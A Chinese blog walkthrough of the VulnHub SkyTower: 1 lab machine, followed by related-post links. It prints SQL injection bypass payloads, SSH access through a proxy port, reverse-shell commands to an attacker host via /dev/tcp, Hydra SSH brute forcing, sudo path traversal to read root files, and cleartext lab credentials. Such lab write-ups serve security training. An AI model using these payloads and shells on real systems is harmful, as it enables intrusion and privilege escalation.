SkyTower: 1打靶渗透【附POC】(权限提升)

于 2024-07-31 20:54:40 发布
阅读量657 收藏 20
点赞数 14
分类专栏: 打靶日常 文章标签: 网络 web安全 网络安全 学习 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/140832401
版权

靶机下载地址:SkyTower: 1 ~ VulnHubSkyTower: 1, made by Telspace. Download & walkthrough links are available.icon-default.png?t=N7T8https://www.vulnhub.com/entry/skytower-1,96/

1. 主机发现+端口扫描+目录扫描

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:54:4A:37'

1.2. 端口扫描

nmap -p- 192.168.7.61

1.3. 目录扫描

dirb http://192.168.7.61

2. WEB打点寻找漏洞

2.1. 进入80端口

  1. 出现登录框 -> 尝试万能密码登录 -> 出现报错,大几率存在SQL注入漏洞

  1. 继续尝试绕过验证 -> ||绕过
# 账号
1111111' || 1=1#
# 密码
1' || 1=1 #

  1. 提示我们使用ssh登录,且给予了我们一个账号密码

john:hereisjohn

2.2. 尝试登录SSH(22)端口

  1. 尝试登录ssh端口,但是我们在目录扫描时已经提示filtered(不信邪,尝试连接还是不行)

  1. 22端口无法使用,3128端口是一个代理端口,尝试利用3128端口进行代理访问22端口 -> 打开proxychains的配置文件进行配置代理
http 192.168.7.61 3128

  1. 先用nmap进行扫描对我们的猜想进行验证
proxychains nmap -PN 192.168.7.61 -p22 --min-rate 3000 -sT
# proxychains 用于确保nmap发出的所有流量都经过代理服务器。
# -PN 不进行Ping
# -P22 指定找22端口
# --min-rate 3000 设置了最小3000扫描速率
# -sT 指定使用 TCP 连接扫描

发现ssh的22端口打开了,

继续挂代理,尝试对我们获取到的账号密码进行登录

proxychains ssh john@192.168.7.61

登录成功,但是连接被关闭了

但是在进行ssh登陆时可以携带一条指令 -> 再次尝试 -> 成功!

proxychains ssh john@192.168.7.61 whoami

2.3. 尝试反弹shell

  1. 我们由上可知,虽然ssh无法连接,但是命令缺可带入后端执行 -> 重起一窗口打开监听 -> 写入反弹shell命令
nc -lvnp 8888 

proxychains ssh john@192.168.7.61 "sh -i >& /dev/tcp/攻击机IP/8888 0>&1"

成功反弹!!!

3. 权限提升

3.1. 利用反弹shell获取权限

  1. 查看当前所在的目录位置和目录中的文件,看看有没有可用的

  1. 切换至\根目录,查看下可用的文件 -> 大部分网站根目录是/var/www,我们可转去查看
cd /
ls -a
cd var/www

进入网站根目录

  1. 由于登录页面存在SQL注入,尝试catlogin.php文件,看看有无可利用信息 -> 爆出前端白名单过滤(不大重要)+疑似sql数据库的账号密码【root:root】
cat login.php

  1. 尝试登录数据库 -> 反弹shell不稳定。
mysql -u root -p

  1. 虽然我们已经知道网站根目录了,但是没有写的权限,一句话木马蚁剑连接条件不足pass掉;【唉~返回原点重新寻找可利用的点】-> 我们刚开始查看我们所在目录位置起大作用【cd返回查看】
cd /home/join

老规矩,逐一打开测试,查看存在可以的点

发现.bashrc文件里面存在着我们22端口断联的原因 -> 对该文件直接重命名给或者删除

cat .bashrc
mv .bashrc .bashrc.bak

退出nc,回到ssh界面,再次尝试登录 -> 成功登录

proxychains ssh john@192.168.7.61

3.2. 权限提升

  1. 利用上方的账号密码,登录数据库【root:root】
mysql -u root -p

查看库

show databases;

use SkyTech

show tables;

select * from login;

  1. 新起一个窗口,将账号密码都进行保存,
vim user.txt #保存账号
vim password.txt #保存密码

  1. 对ssh端口进行批量爆破 -> 尝试登录sara用户
proxychains hydra -L user.txt -P password.txt ssh://192.168.7.61 -v
# 【login: sara   password: ihatethisjob】
proxychains ssh sara@192.168.7.61 #登录sara用户

淦~又被断联了~重复上述的监听->连接->改名,让我们重新可以直接使用ssh登录此sara

proxychains ssh sara@192.168.7.61 "sh -i >& /dev/tcp/192.168.7.36/8888 0>&1"
nc -lvnp 8888 # 监听
mv .bashrc .bashrc.bak 
# 重连~~~

  1. 查看下该用户的权限 -> 普通用户
whoami
id
sudo -l

  1. sara用户带有(root)权限的使用,尝试用这个进行提权

sudo /bin/cat /accounts/ ../../etc/passwd

  1. 我们可以用该方法去查看下root目录有什么文件,只需要将”cat“替换为”ls“
sudo /bin/ls /accounts/ ../../root

  1. 有个flag文件,我们进行查看 -> 存在root密码
sudo /bin/cat /accounts/ ../../root/flag.txt

  1. 切换root用户登录 -> 提权成功
su root

Kucei
关注
  • 14
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SkyTower:动作平台游戏,爬塔到天上去
06-08
SkyTower: 动作平台游戏的开发与技术解析》 在游戏开发的世界里,"SkyTower"是一款引人入胜的动作平台游戏,其核心玩法是挑战玩家攀登高耸入云的天空塔。这款游戏的独特之处在于它融合了动作、平台跳跃和攀登元素...
VulnHub-SkyTower: 1-靶机渗透学习
嗯嗯呐的博客
12-18 1234
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 靶机难度:中级(CTF) 靶机发布日期:2014年6月26日 靶机描述:该CTF是由Telspace Systems在ITWeb安全峰会和BSidesCPT(开普敦)上为CTF设计的。目的是测试中级到高级的安全爱好者使用多方面方法攻击系统并获得“标志”的能力。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 信息收集 nmap扫描靶机地址 nmap扫描端口 22 SSH 80 http
vulnhub SkyTower: 1
箭雨镜屋
12-21 2999
本文思路: nmap扫描端口---->万能密码登录web,拿到john的ssh密码----->通过代理连接ssh,得到john的shell---->linpeas.sh扫描发现mysql---->通过mysql得到其他用户ssh账户密码---->用sara用户登录并通过sudo命令提权(找到root的密码)
No.11-VulnHub-SkyTower: 1-Walkthrough渗透学习
qq_34801745的博客
01-09 1698
** VulnHub-SkyTower: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 靶机难度:中级(CTF) 靶机发布日期:2014年6月26日 靶机描述:该CTF是由Telspace Systems在ITWeb安全峰会和BSidesCPT(开普敦)上为CTF设计的。目的是测试中级到高级的安全爱好者使用多方...
Vulnhub:SkyTower:1靶机
qq_43884092的博客
03-19 127
修改/etc/proxychains4.conf,把代理指向目标的3128端口。使用弱口令:root|root,登录mysql,得到另外两个用户的密码。查看flag.txt,获得root的密码。靶机:192.168.111.236。使用ls查看root家目录下的文件。使用用户sara登录ssh。通过代理连接目标ssh。sara的sudo权限
网安科班精选!爱荷华大学教授的网络安全零基础入门教程!
最新发布
互联网架构小马的博客
07-31 139
网络就像一把双刃剑,给我们的生活、交流、工作和发展带来了便利,但同时也给信息安全以及个人隐私带来了威胁。网络和信息安全问题不仅影响了网络的普及和应用,还关系到企国家、军队、企业的信息安全和社会的经济安全,让人又爱又恨。今天给大家分享的这份手册,主要从网络漏洞、协议和安全解决方案等方面来探讨网络安全问题。我们把网络看成是不安全安全的源头,通过分析网络漏洞、探测、攻击和减少攻击的方法,来研究不同的网络协议。
计算机网络—电路、分组、报文交换—图文详解
喻师傅的学习笔记
07-31 445
计算机网络—三种交换方式图文详解
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 385
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
S5730举例
jjjxxxhhh123的博客
07-27 977
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
网络安全在2024好入行吗?
2401_84466225的博客
07-29 566
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
保护国外使用代理IP的安全方法
iphttp的博客
07-30 237
用户在国外使用代理IP时,应该时刻保持警惕,不要随意点击可疑链接,养成良好的网络安全意识。此外,用户还应该避免在代理服务器上输入敏感信息,如银行账号、密码等。使用代理IP时,用户应该尽量使用加密协议(如SSL、TLS)来保护数据传输的安全。这将确保用户的个人信息和访问记录不会被黑客窃取或监控。在选择代理服务器时,用户应该选择那些经过验证和信任的服务器,如知名的VPN服务提供商。用户应该定期更新操作系统和软件,以确保其安全性。这样可以有效地防止黑客通过代理服务器攻击用户的计算机或移动设备。
Python面试题:如何使用WebSocket实现实时Web应用
bigorsmallorlarge的专栏
07-30 393
通过上述步骤,你可以使用 Django Channels 和 WebSocket 创建一个简单的实时 Web 应用。Django Channels 提供了强大的功能,使得在 Django 中实现实时功能变得更加容易。你可以在此基础上扩展,添加更多功能和复杂的逻辑。
TCP和UDP协议的区别以及原理
2301_78276982的博客
07-30 609
该文章是看了很多的网上的博主写的关于TCP和UDP做的总结,我呢也想着关于自己的想法,带大家重新认知了一下TCP和UDP的原理以及区别,做一个简单的梳理和总结,希望能给予你们一些启发。
探索GAN 在改善网络安全方面的作用
知来者逆的博客
07-25 650
GAN 是一类机器学习框架,由两个神经网络组成——生成器和鉴别器。这两个网络在一个动态过程中竞争,生成器创建数据样本,鉴别器对其进行评估。生成器的目标是尽可能地生成与实际样本相似的数据。而鉴别器的目标是区分真实数据和生成的数据。在训练过程中,这种对抗关系促使两个网络不断改进。生成器会改进其输出以创建更令人信服的数据,而鉴别器则会提高其检测细微差异的能力。这种竞争会产生高度逼真的数据,使得 GAN 对于需要创建合成数据和网络安全中稳健测试场景的任务非常有用。
uniapp使用WebSocket uniapp使用WebSocket Uniapp整合WebSocket uniapp使用 websocket
半只
07-29 185
代码中的示例只在 H5、APP环境下成功运行,小程序环境下如果无效,需要使用预编译 - 条件性的编译,适配 小程序环境#ifdef H5:针对 Web H5页面。:针对原生应用(Android 和 iOS)。:针对微信小程序。:针对支付宝小程序。:针对百度小程序。:针对字节跳动小程序。:针对 QQ 小程序。:针对快手小程序。:针对京东小程序。
计算机网络-PIM协议基础概念
Linux基础知识、计算机网络基础学习分享。
07-31 280
PIM-SM模式主要用在组成员较多且相对稀疏的组播网络中,该模式建立组播分发树的基本思路是先收集组成员信息,然后再形成组播分发树。(PIM-Dense Mode,PIM密集模式),PIM-DM模式主要用在组成员较少且相对密集的组播网络中,该模式建立组播分发树的基本思路是“扩散-剪枝”,即将组播流量全网扩散,然后剪枝没有组成员的路径,最终形成组播分发树。PIM-SM模式主要用在组成员较多且相对稀疏的组播网络中,该模式建立组播分发树的基本思路是先收集组成员信息,然后再形成组播分发树。作为组播路由解决方案,
大学计算机专业主要课程及概要介绍
07-26 1405
计算机专业还包含丰富的实践教学环节,如工程训练、计算机应用基础训练、认识实习、生产实习、毕业实习、教学实验、社会实践、课程设计和毕业设计等。这些环节旨在通过实际操作和项目经验,提升学生的动手能力和解决实际问题的能力。综上所述,大学计算机专业课程设置全面且深入,旨在培养学生在计算机科学与技术领域的综合能力和创新精神。通过系统的学习和实践,学生将能够掌握计算机科学的基本理论和技术,为未来的职业发展打下坚实的基础。大学计算机专业是一门涵盖广泛领域的学科,旨在培养学生在计算机科学与技术方面的理论知识与实践能力。
WebSocket的优势是什么?
weixin_54503231的博客
07-31 213
WebSocket在客户端和服务器之间建立了单一的连接,用于持续的数据传输。与HTTP请求相比,WebSocket的协议头部信息更加精简,减少了每次传输时所需的带宽。同时,由于减少了连接建立和断开的次数,也降低了服务器的资源消耗。与传统的HTTP请求-响应模式相比,WebSocket减少了频繁建立和断开连接的开销,从而降低了延迟。在HTTP模式下,每次数据更新都需要建立一个新的连接,而在WebSocket中,连接一旦建立就保持打开状态,直到被显式关闭。WebSocket是一种标准化的协议,可以跨平台使用。
计算机基础(Windows 10+Office 2016)教程 —— 第4章 计算机网络与Internet(下)
m0_70617423的博客
07-31 554
局域网 Internet Internet的应用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值